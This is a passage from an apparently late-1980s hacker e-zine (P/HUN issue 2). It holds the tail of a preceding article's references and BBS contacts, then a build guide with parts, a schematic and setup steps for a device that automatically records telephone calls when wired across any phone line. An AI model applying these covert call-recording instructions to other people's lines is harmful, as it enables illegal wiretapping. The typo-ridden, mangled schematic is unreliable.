IBM VM/CMS Operating System by Lex Luthor The LOD/H Technical Journal #2 3) Hacking the IRIS Operating System by The Leftist The LOD/H Technical Journal #3 4) Hacking CDC's Cyber by Phrozen Ghost Phrack Inc. Newsletter #18 5) USENET comp.risks digest (various authors, various issues) 6) USENET unix.wizards forum (various authors) 7) USENET info-vax forum (various authors) Recommended Reading: 1) Hackers by Steven Levy 2) Out of the Inner Circle by Bill Landreth 3) Turing's Man by J. David Bolter 4) Soul of a New Machine by Tracy Kidder 5) Neuromancer, Count Zero, Mona Lisa Overdrive, and Burning Chrome, all by William Gibson 6) Reality Hackers Magazine c/o High Frontiers, P.O. Box 40271, Berkeley, California, 94704, 415-995-2606 7) Any of the Phrack Inc. Newsletters & LOD/H Technical Journals you can find. Acknowledgements: Thanks to my wife for putting up with me. Thanks to Lone Wolf for the RSTS & TOPS assistance. Thanks to Android Pope for proofreading, suggestions, and beer. Thanks to The Urvile/Necron 99 for proofreading & Cyber info. Thanks to Eric Bloodaxe for wading through all the trash. Thanks to the users of Phoenix Project for their contributions. Thanks to Altos Computer Systems, Munich, for the chat system. Thanks to the various security personel who were willing to talk to me about how they operate. Boards: I can be reached on the following systems with some regularity- The Phoenix Project: 512/441-3088 300-2400 baud Hacker's Den88: 718/358-9209 300-1200 baud Smash Palace South: 512/478-6747 300-2400 baud Smash Palace North: 612/633-0509 300-2400 baud =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = Volume 1 , P/HUN #2 , Phile #9 of 9 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= TELEPHONE-CONTROLLED TAPE STARTER --------------------------------- BY: NY HACKER NEWYORK UNDERGROUND ASSOCIATION! WRITTEN FOR THE P/HUN ONLINE MAGAZINE ::::::::::::::::::::::::::::::::::::: BASIC ELECTRONIC KNOWLEDGE IS ASSUMED: WHY SPEND 200$ DOLLARS ON A ANSWERING MACHINE WHILE YOU CAN SPEND JUST A DOLLAR ON PARTS TO MAKE YOUR OWN .HAVE I CAUGHT YOUR INTREST YET? THIS SMALL PIECE OF EQUIPMENT WILL CONVERT YOUR TAPE RECORDER INTO A FULLY AUTOMATIC RECORDING MACHINE.THIS HAS BEEN DESIGNED IN A SUCH A WAY THAT NO EXTERNAL POWER WILL BE NEEDED.LETS SAY SOMEONE PICKS UP THE PHONE TO DIAL OR WHEN THERES INCOMING CALLS.THIS GADJET WILL ALLOW AUTOMATIC RECORDING TO START BOTH WAYS AND WHEN YOU HANG UP IT STOPS.NO MODIFICATION OF THE PHONE OR THE TAPE RECORDER IS NECCESSARY.SIMPLY CONNECT TWO WIRES TO A TELEPHONE JACK OR ANYWHERE ELSE ACROSS YOUR TWO TELEPHONE WIRES. THIS GADJET PLUGS IN TO THE TAPE RECORDER WHERE THE MICROPHONE USUALLY GOES. HOW IT WORKS :::::::::::: REFER TO THE SCHEMATIC BELOW WITH THE SWITCH TERNINALS OF YOUR TAPE RECORDER "OPEN",YOU CAN MEASURE A VOLTAGE ACROSS THEM THAT IS EQUAL TO THE DC VOL. USED TO OPERATE THE MACHINE. THIS IS USUALLY AROUD 6V.IF WE APPLY THIS READILY AVAILABLEVOL. TO A PAIR OF DARLINGTON-CONNECTED TRASISTORS,Q1 AND Q2,THEY WILL TURN ON AND START THE TAPE RECORDER. TO TURN THE TRANSISTORS OFF,AND THEREBY STOP THE MACHINE,WE HAVE TO APPLY A NEAGATIVE VOL. TO THE BASE TO THE Q1 TRANSITOR.THIS IS DONE BY THE VOL. FROM THE TELEPHONE LINE. WHEN THE TELEPHONE LINE IS ON HOOK THERES 48 VOL DC.THIS WVOLTAGE IS DIVIDED ACROSS R1,R2 AND R4 RESISTORS IN WAY THAT ALLOWS THE BASE TO Q1 TO BE NEGATIVLY BASED THEREFORE KEEPING THE RECORDER OFF.ALSO WHEN THE PHONE IS PICKED UP THE VOLTAGE IS ABOUT 12 VOLTS WHICH LEAVES ENOUGH WONT KEEP THE Q1 BASE NEGATIVE TO KEEP IT CUT OFF, SO THE TAPE RECORDER STARTS.SIMPLE HUH? CONSTRUCTION :::::::::::: WHAT WORKS THE BEST AS A CASING FOR THIS EQIPMENT IS A FLORECENT STARTER HOUSING.THIS WILL FIT THE 2 TRANSISTORS,THE DIODE,4 RESISTORS AND THE COUPLING CAPACITOR BUT THE CONTAINMENT IS UP TO YOU. REMOVE AND DISCARD TEH STARTER ELEMENT,BUT SAVE THE BAKELITE BASE FOR USE AS A CONVENIENT TERMINAL BOARD FOR ALL COMPONENTS.THIS BEST WAY TO DO BUILD THIS (IF BUILDING IN A FLORECENT STARTER) IS TO USE POINT TO POINT WIRING BECAUSE IT WILL REDUCE THE SIZE.INVERT THE BASE SO THAT THE BRASS TERMINALS ARE INSIDE WHICH WILL MAKE WIRING EASY.THE RUBBERY MATERIAL AT THE BOTTOM WILL PROTECT THE THE WIRES TO THE TAPRE RECORDER.THE WIRES TO THE PHONE JACK CAN DIRECTLY BE SOLDERED TO THE TERMINAL OR WHAT I PREFER TO DO IS WHICH IS VERY CONVENIENT IS JUST DRILL 2 HOLES IN THE COVER AND INSERT THEM. PARTS LIST :::::::::: R1 - 270K,1/4,10% RESISTOR R2 - 68K,1/4,10% " R3 - 33K,1/4,10% " R4 - 1.5K,1/4,10% " Q1,Q2 - 2N4954 TRASISTOR (RADIO SHACK 276-2009) D1 - 1N645 DIODE (R.S - 276-1104) C1 - 0.22 UF,50-V DIPPED SOLID TANTALUM CAPACITOR MISC - TELEPHONE PLUG,FLORESCENT STARTER HOUSING,WIRE,SOLDER SCHEMATICS :::::::::: +-----(R3)------+ | +---+--I<--|-----(+) | | (D1) TO TAPE RECORDER REMOTE CONTROL (-)------+---(R1)--| | | ___ (-) JACK TO TEL | | |/(Q1) | | (+)______| (R2) |X_______|/(Q2) | | |--(R4)---| |X_ | | _| |_______________|_______| | | | +-)I----+ | (C1) | | | () () THESE GO TO THE TAPE RECORDER MICORPHONE INPUT HACK THE TRASISTORS' B,E,C IS AS FOLLOWS ::::::::::::::::::::::::::::::::::: (C) |/ (BASE)|X (EMITTER) INSTALLATION AND USE :::::::::::::::::::: PLUG THIS GADJET INTOT HE PROPER TAPE RECORDER JACKS AND SET THE MACHINE TO PLAYBACK.WITHOUT THE GADJET NOT CONNECTED TO THE PHONE LINE,THE TAPE RECORDER SHOULD START.IF IT DOESNT THEN THE WIRES THAT GOTO THE TAPE R. REMOTE ARE REVERSED. NOW THAT THE MACHINE IS PLAYING WITH THE GADJET PLUGGED IN,CONNECT THE 2 WIRES TO THE PHONE LINE.WITH THE PHONE ON HOOK,TAPE RECORDER SHOULD STOP.IF IT DOESNT REVERSE 2 WIRES WHICH GO TO TEL.(TELEPHONE). O.K THE TAPE RECODER HAS STOPPED, NOW CHECK TO SEE WEATHER THE RECODER STARTS BY LIFITING UP THE HANDSET. TO SET UP FOR RECORDING JUST PRESS THE FOWARD AND RECORD BUTTON ON THE TAPE RECORDER. OTHER THINGS CAN ALSO BE DONE WITH THIS . I WILL LEAVE THAT TO YOUR IMAGINATION I WILL WRITE AN ARTICLE ON HOW TO MAKE A TELEPHONE BUG IN P/HUN #3. IF YOU HAVE ANY ?S I CAN BE CONTACTED AT THE HACKERS DEN88 (718)3599209 NY HACKER NUA! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *** [ End of P/HUN Issue #2 ** A Hackers Den88 Productions ] *** ** [ For you Submissions to P/HUN Call The Hackers Den88 - (718)358/9209 ] ** =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= .